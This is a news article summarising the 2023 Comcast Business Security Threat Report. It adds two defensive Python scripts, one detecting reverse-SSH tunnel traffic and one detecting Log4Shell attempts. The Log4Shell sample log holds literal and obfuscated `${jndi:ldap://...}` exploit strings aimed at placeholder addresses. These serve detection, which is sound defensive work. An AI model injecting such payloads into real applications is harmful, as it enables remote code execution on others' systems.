Comcast Business releases 2023 Comcast Business Security Threat Report

Aug. 21, 2023
Based on the analysis of over 23.5 billion cybersecurity attacks detected by Comcast Business among their security customers, the 2023 Security Threat Report encompasses customer data across Comcast security solutions.

Comcast Business released the 2023 Comcast Business Security Threat Report to help those at the forefront of security and technology glean a deeper understanding of cybersecurity threat trends, as well as preventative steps they can take to protect their organizations.

Based on the analysis of over 23.5 billion cybersecurity attacks detected by Comcast Business among its security customers, the 2023 Security Threat Report draws on customer data across Comcast security solutions, including endpoint detection and response, managed detection and response, vulnerability scanning and exposure management, and DDoS mitigation.

The report maps its findings to the MITRE ATT&CK framework where possible and explores common evasion tactics, the anatomy and chronology of a cyber-attack, the links between phishing and malware, exfiltration and impact techniques and their consequences, and a growing vulnerability landscape.

Comcast Business’ exploration of the anatomy of a cyber-attack begins with initial interest and reconnaissance, during which threat actors start discovering vulnerabilities and other points of access. The next step is most often phishing: Comcast Business reports that nearly 90% of initial access attempts, which totaled almost 2 billion, were made via phishing emails. Other initial access vectors included remote access, credential abuse, web or network access, redirects, and parked domains. Most of these phishing emails carried malicious URLs or attachments that deliver credential-stealing malware.
Once stolen, legitimate credentials let criminals bypass security controls, elevate privileges, and reach systems beyond the initial foothold. As many companies switched to remote work during the COVID-19 pandemic, cyber-criminals began exploiting exposed ports, infecting networks with ransomware, and exploiting vulnerabilities in exposed Transmission Control Protocol (TCP) services to establish connections to victim servers.

After an attacker has breached the network, they move quickly. Using malware payloads to scan endpoints and networks for vulnerabilities, establish evasion techniques, and set up remote access from their own command and control (C&C) servers, they can enter and leave the network whenever they wish. Backdoor malware that opens encrypted reverse SSH proxy tunnels lets them move traffic between the victim network and their C&C infrastructure, download additional malware, and infect other machines.

Depending on the permissions attackers are able to obtain, they can do increasingly serious damage, and backdoor malware is difficult to identify and disable once installed. The report identified 14 billion backdoor malware events, as well as 6 billion halted connection attempts by infected machines.
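A reverse SSH tunnel shows up in network telemetry as an internal host that keeps re-establishing outbound SSH sessions to an external address, typically on a fixed schedule and for long stretches. The script below is an added example for this article, not code from the Comcast Business report. It assumes a hypothetical tab-separated connection-summary format (timestamp, source IP, destination IP, destination port, duration in seconds, bytes out), treats 10.0.0.0/8 as the internal range, and uses an assumed allowlist of sanctioned SSH destinations; the log records are constructed for the example.

```python
"""Flag likely reverse-SSH tunnel activity in outbound connection records.

Added example for this article; not code from the Comcast Business report.
Assumptions (hypothetical): connection summaries are tab-separated as
timestamp, src_ip, dst_ip, dst_port, duration_seconds, bytes_out; the
internal range is 10.0.0.0/8; ALLOWED_SSH_DESTS lists sanctioned SSH hosts.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumption: internal address space
ALLOWED_SSH_DESTS = {"203.0.113.10"}            # assumption: e.g. a sanctioned bastion

# Constructed sample records, not real telemetry. 10.1.7.33 reconnects to an
# external host on port 22 every hour for about an hour at a time: the shape
# of a backdoor keeping a reverse SSH tunnel alive to its C&C server.
SAMPLE_LOG = """\
2023-05-01T08:00:02Z\t10.1.4.20\t10.1.4.5\t22\t120\t4096
2023-05-01T08:01:10Z\t10.1.4.20\t203.0.113.45\t443\t3\t1200
2023-05-01T08:05:00Z\t10.1.7.33\t198.51.100.9\t22\t3600\t90000
2023-05-01T09:05:03Z\t10.1.7.33\t198.51.100.9\t22\t3599\t88000
2023-05-01T10:05:01Z\t10.1.7.33\t198.51.100.9\t22\t3601\t91000
2023-05-01T10:30:00Z\t10.1.9.8\t192.0.2.77\t22\t45\t800
2023-05-01T11:00:00Z\t10.2.1.1\t203.0.113.10\t22\t600\t5000
"""


def parse_log(text):
    """Parse the hypothetical tab-separated format into dicts with typed fields."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, dur, out = line.split("\t")
        records.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "src": src, "dst": dst, "port": int(port),
            "duration": int(dur), "bytes_out": int(out),
        })
    return records


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL


def outbound_ssh(records):
    """Internal -> external SSH sessions to hosts that are not on the allowlist."""
    return [r for r in records
            if r["port"] == 22 and is_internal(r["src"]) and not is_internal(r["dst"])
            and r["dst"] not in ALLOWED_SSH_DESTS]


def analyze(records, long_lived_s=1800, min_beacons=3, jitter=0.2):
    """Return {(src, dst): [flags]} for suspicious outbound SSH pairs.

    long_lived_s: a single session at least this long is flagged.
    min_beacons / jitter: at least min_beacons connections whose inter-arrival
    gaps all sit within +/- jitter of the mean gap are flagged as periodic.
    """
    by_pair = defaultdict(list)
    for r in outbound_ssh(records):
        by_pair[(r["src"], r["dst"])].append(r)
    findings = {}
    for pair, conns in by_pair.items():
        conns.sort(key=lambda r: r["ts"])
        flags = ["outbound_ssh_to_unsanctioned_host"]
        if any(c["duration"] >= long_lived_s for c in conns):
            flags.append("long_lived_session")
        if len(conns) >= min_beacons:
            gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(conns, conns[1:])]
            mean = sum(gaps) / len(gaps)
            if mean > 0 and all(abs(g - mean) <= jitter * mean for g in gaps):
                flags.append("periodic_reconnect")
        findings[pair] = flags
    return findings


if __name__ == "__main__":
    for (src, dst), flags in analyze(parse_log(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}: {', '.join(flags)}")
```

On the constructed records this flags 10.1.7.33 for both a long-lived session and hourly reconnects, and 10.1.9.8 only for an unsanctioned outbound SSH session; the connection to the allowlisted bastion and the internal-to-internal SSH session are ignored. The periodicity test is deliberately simple (a bounded spread around the mean gap); in production the same logic would be applied per pair over a rolling window and tuned against known automation such as backup jobs.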

Comcast Business’ report further expounds on the widening vulnerability landscape. According to the National Vulnerability Database, 26,448 new application- and infrastructure-related vulnerabilities were added, with 59% of them classified as “critical”. Comcast stopped more than 450 million vulnerability exploit attempts across 900 categories in 2022, and pre-packaged exploit kits allow even attackers without advanced knowledge to threaten systems.

One specific vulnerability Comcast Business outlines as particularly endemic is Log4Shell (CVE-2021-44228), the remote code execution flaw in Apache Log4j that was first exploited as a zero-day. It remains a significant risk because of the library’s prevalence in Java applications and the low percentage of companies that have patched the susceptible applications. Three-fifths of organizations have experienced a Log4j exploit attempt, and many of the 14 million backdoor attempts halted by the company were follow-on activity from Log4j exploitation.
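Log4Shell exploit attempts are visible in ordinary web server logs because the payload is a Log4j lookup string, `${jndi:...}`, injected into any field the application logs (headers, query strings, user agents). Attackers routinely obfuscate the string with nested lookups and URL encoding, so a literal match on `${jndi:` misses most of them. The scanner below is an added example for this article, not code from the Comcast Business report. It assumes combined-style access log lines whose first token is the client IP, resolves the lookups attackers most commonly use to split up the word "jndi" (`${lower:x}`, `${upper:x}` and the `${x:-y}` default syntax, including the `${::-j}` form) and URL-decodes twice before matching; it does not emulate every Log4j lookup. The log lines are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) exploit attempts in web access logs.

Added example for this article; not code from the Comcast Business report.
Assumption: combined-style access log lines where the first token is the
client IP. The normalizer resolves the Log4j lookups attackers most often use
to obfuscate "jndi" (lower, upper, and the ${x:-y} default syntax) and
URL-decodes twice; it does not emulate every Log4j lookup.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic); documentation IPs only.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Dec/2021:14:03:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.3:1389/a}"
198.51.100.3 - - [10/Dec/2021:14:04:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.3:1389/a}"
198.51.100.3 - - [10/Dec/2021:14:05:40 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.3%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.81.0"
192.0.2.9 - - [10/Dec/2021:14:07:02 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://192.0.2.9/x} HTTP/1.1" 404 0 "-" "python-requests/2.28"
203.0.113.8 - - [10/Dec/2021:14:09:55 +0000] "GET /docs/${version}/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# ${lower:X} / ${upper:X} with a plain (non-nested) argument.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-default} with a plain argument; ${::-j} resolves to "j".
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup that triggers the JNDI fetch; group 1 is the URL scheme (ldap, rmi, dns...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_case(m):
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(s, max_rounds=10):
    """Collapse nested lookups and URL encoding so obfuscated payloads read like plain ones.

    Innermost lookups are resolved first; each round rewrites the string until
    nothing changes or max_rounds is hit (a bound against pathological input).
    """
    s = unquote(unquote(s))
    for _ in range(max_rounds):
        new = _DEFAULT.sub(lambda m: m.group(1), _CASE.sub(_resolve_case, s))
        if new == s:
            break
        s = new
    return s


def scan(text):
    """Return one hit per log line whose normalized form contains a JNDI lookup."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _JNDI.search(normalize(line))
        if m:
            hits.append({"client": line.split()[0], "scheme": m.group(1).lower(), "line": line})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h['client']} jndi:{h['scheme']}  {h['line'][:80]}")
```

The benign `${version}` path is not flagged because the detector keys on the `jndi:` lookup after normalization rather than on `${` alone. A hit here is an attempt, not a confirmed compromise; the confirming evidence is an outbound LDAP, RMI or DNS connection from the application host to the address in the payload shortly afterwards, which is the kind of post-exploitation backdoor traffic the report describes.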

Once they have remained undetected, the attacker’s focus shifts to expanding their presence, gathering as much information as possible to increase the impact of the attack. Lateral movement lets attackers spread rapidly across networks using fileless malware techniques, remote services, or remote code execution.

Comcast Business reported that the end goals of the most common cyber-attacks include exfiltration of data stored on devices and servers, denial-of-service attacks, service stops, resource hijacking, and holding data hostage. Comcast stopped 10 billion of these attack events in 2022.

To halt the advances of cyber-criminals, Comcast Business suggests a number of steps organizations can take. Patching and keeping systems up to date remains the most important step, though the report also advocates Zero Trust architectures, multi-factor authentication, mandatory security awareness training, vulnerability scanning, network segmentation, and endpoint security. The full 2023 Comcast Business Security Threat Report is available from Comcast Business.
